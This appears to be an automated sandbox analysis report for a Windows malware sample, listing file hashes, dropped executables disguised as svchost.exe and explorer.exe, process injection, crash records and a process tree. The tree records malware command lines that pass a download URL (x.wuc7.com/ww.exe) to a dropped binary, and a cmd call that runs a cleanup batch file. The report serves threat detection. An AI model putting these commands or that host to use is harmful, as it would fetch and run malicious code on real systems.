f3758515dff93de0e92e51e59ac08c0cfc07aff142be8d18c8319f8d371209fd

General

Target

3d050dee82ff7193a936198d53fd42c0.exe
Size

66KB
MD5

3d050dee82ff7193a936198d53fd42c0
SHA1

372ce0bd857a1a511e96ca295a7a218a597c7df7
SHA256

f3758515dff93de0e92e51e59ac08c0cfc07aff142be8d18c8319f8d371209fd
SHA512

cd5faafe2ec511a3903de53665cfe230127668ecb8abbd759e1ab7e1804ffb021be129ad85b6d71c9cd152d5f8e6921051ad485c14a0911211d1949f5ce05807
SSDEEP

1536:kdqzXQ0G22Q0GWUNQt00uJGFqjbqxg4RcqlqmQzYon:9XVGRQ0zyR0gGFJlJiYon

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
1000	a1g.exe
684	svchost.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\dqfpng.dll	3d050dee82ff7193a936198d53fd42c0.exe
File created	C:\Windows\SysWOW64\a1g.exe	3d050dee82ff7193a936198d53fd42c0.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Fonts\svchost.exe	a1g.exe
File created	C:\Windows\Downloaded Program Files\explorer.exe	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 14 IoCs

pid	pid_target	Process	procid_target
1484	5004	WerFault.exe
860	1424	WerFault.exe
4980	3128	WerFault.exe
3144	4596	WerFault.exe
1732	4120	WerFault.exe
4080	1748	WerFault.exe
4200	2708	WerFault.exe
3848	3500	WerFault.exe
1200	4488	WerFault.exe
1268	4256	WerFault.exe
2480	2204	WerFault.exe
3212	1576	WerFault.exe
2480	3144	WerFault.exe	118
516	4936	WerFault.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4896	3d050dee82ff7193a936198d53fd42c0.exe
4896	3d050dee82ff7193a936198d53fd42c0.exe
1000	a1g.exe
1000	a1g.exe
684	svchost.exe
684	svchost.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4896 wrote to memory of 1000	4896	3d050dee82ff7193a936198d53fd42c0.exe	60
PID 4896 wrote to memory of 1000	4896	3d050dee82ff7193a936198d53fd42c0.exe	60
PID 4896 wrote to memory of 1000	4896	3d050dee82ff7193a936198d53fd42c0.exe	60
PID 1000 wrote to memory of 684	1000	a1g.exe	92
PID 1000 wrote to memory of 684	1000	a1g.exe	92
PID 1000 wrote to memory of 684	1000	a1g.exe	92

C:\Users\Admin\AppData\Local\Temp\3d050dee82ff7193a936198d53fd42c0.exe
"C:\Users\Admin\AppData\Local\Temp\3d050dee82ff7193a936198d53fd42c0.exe"
1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4896
- C:\Windows\SysWOW64\a1g.exe
  C:\Windows\system32\a1g.exe
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1000
- - C:\Windows\Fonts\svchost.exe
    C:\Windows\Fonts\svchost.exe
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    PID:684
  - - C:\Windows\Downloaded Program Files\explorer.exe
      "C:\Windows\Downloaded Program Files\explorer.exe" 10.127.0.1 http://x.wuc7.com/ww.exe
      4⤵
      PID:5004
  - - C:\Windows\Downloaded Program Files\explorer.exe
      "C:\Windows\Downloaded Program Files\explorer.exe" 10.127.0.2 http://x.wuc7.com/ww.exe
      4⤵
      PID:1424
  - - C:\Windows\Downloaded Program Files\explorer.exe
      "C:\Windows\Downloaded Program Files\explorer.exe" 10.127.0.3 http://x.wuc7.com/ww.exe
      4⤵
      PID:3128
  - - C:\Windows\Downloaded Program Files\explorer.exe
      "C:\Windows\Downloaded Program Files\explorer.exe" 10.127.0.4 http://x.wuc7.com/ww.exe
      4⤵
      PID:4596
  - - C:\Windows\Downloaded Program Files\explorer.exe
      "C:\Windows\Downloaded Program Files\explorer.exe" 10.127.0.5 http://x.wuc7.com/ww.exe
      4⤵
      PID:4120
  - - C:\Windows\Downloaded Program Files\explorer.exe
      "C:\Windows\Downloaded Program Files\explorer.exe" 10.127.0.6 http://x.wuc7.com/ww.exe
      4⤵
      PID:1748
  - - C:\Windows\Downloaded Program Files\explorer.exe
      "C:\Windows\Downloaded Program Files\explorer.exe" 10.127.0.7 http://x.wuc7.com/ww.exe
      4⤵
      PID:2708
  - - C:\Windows\Downloaded Program Files\explorer.exe
      "C:\Windows\Downloaded Program Files\explorer.exe" 10.127.0.8 http://x.wuc7.com/ww.exe
      4⤵
      PID:3500
  - - C:\Windows\Downloaded Program Files\explorer.exe
      "C:\Windows\Downloaded Program Files\explorer.exe" 10.127.0.9 http://x.wuc7.com/ww.exe
      4⤵
      PID:4488
  - - C:\Windows\Downloaded Program Files\explorer.exe
      "C:\Windows\Downloaded Program Files\explorer.exe" 10.127.0.10 http://x.wuc7.com/ww.exe
      4⤵
      PID:4256
  - - C:\Windows\Downloaded Program Files\explorer.exe
      "C:\Windows\Downloaded Program Files\explorer.exe" 10.127.0.11 http://x.wuc7.com/ww.exe
      4⤵
      PID:2204
  - - C:\Windows\Downloaded Program Files\explorer.exe
      "C:\Windows\Downloaded Program Files\explorer.exe" 10.127.0.12 http://x.wuc7.com/ww.exe
      4⤵
      PID:1576
  - - C:\Windows\Downloaded Program Files\explorer.exe
      "C:\Windows\Downloaded Program Files\explorer.exe" 10.127.0.13 http://x.wuc7.com/ww.exe
      4⤵
      PID:3144
  - - C:\Windows\Downloaded Program Files\explorer.exe
      "C:\Windows\Downloaded Program Files\explorer.exe" 10.127.0.14 http://x.wuc7.com/ww.exe
      4⤵
      PID:4936
- C:\Windows\Fonts\cmmd
  C:\Windows\Fonts\cmmd
  2⤵
  PID:5012
- C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  2⤵
  PID:368
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c c:\DEL.bat
  2⤵
  PID:2972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5004 -ip 5004
1⤵
PID:4612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5004 -s 284
1⤵
- Program crash
PID:1484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 252
1⤵
- Program crash
PID:860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1424 -ip 1424
1⤵
PID:3584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3128 -ip 3128
1⤵
PID:704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3128 -s 248
1⤵
- Program crash
PID:4980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4596 -ip 4596
1⤵
PID:2576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 248
1⤵
- Program crash
PID:3144
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3144 -s 248
  2⤵
  - Program crash
  PID:2480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 248
1⤵
- Program crash
PID:1732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4120 -ip 4120
1⤵
PID:4872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1748 -ip 1748
1⤵
PID:3280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1748 -s 248
1⤵
- Program crash
PID:4080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2708 -ip 2708
1⤵
PID:4880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2708 -s 248
1⤵
- Program crash
PID:4200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3500 -ip 3500
1⤵
PID:2912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3500 -s 248
1⤵
- Program crash
PID:3848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4488 -ip 4488
1⤵
PID:4092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 248
1⤵
- Program crash
PID:1200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 248
1⤵
- Program crash
PID:1268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4256 -ip 4256
1⤵
PID:4080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2204 -ip 2204
1⤵
PID:1248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2204 -s 248
1⤵
- Program crash
PID:2480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1576 -s 248
1⤵
- Program crash
PID:3212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1576 -ip 1576
1⤵
PID:1740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3144 -ip 3144
1⤵
PID:3152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4936 -ip 4936
1⤵
PID:1808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 248
1⤵
- Program crash
PID:516

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\a1g.exe

Filesize
15KB

MD5
4db4c03f21b2b527672f92a67a4c3cf7

SHA1
412742a333603e242774ca2603c2a11cb1ec5e29

SHA256
c80f3cd8218d86f5a38c687c3a00b9a229666276abb319bd5557bf8ffe3b923f

SHA512
d248f46eea38d84791f6906371b4fc085e8b9adde80615acd2bdc3aeed08c1a300747a0e89c0c2fc4bd2d1a85ab450cdce4ea48abef2fbad0d50488cb1640dcb

Download Submit
memory/368-35-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/368-38-0x0000000000D80000-0x0000000000D8A000-memory.dmp

Filesize
40KB

Download
memory/4896-10-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/4896-27-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/4896-34-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download

Analysis

Sharing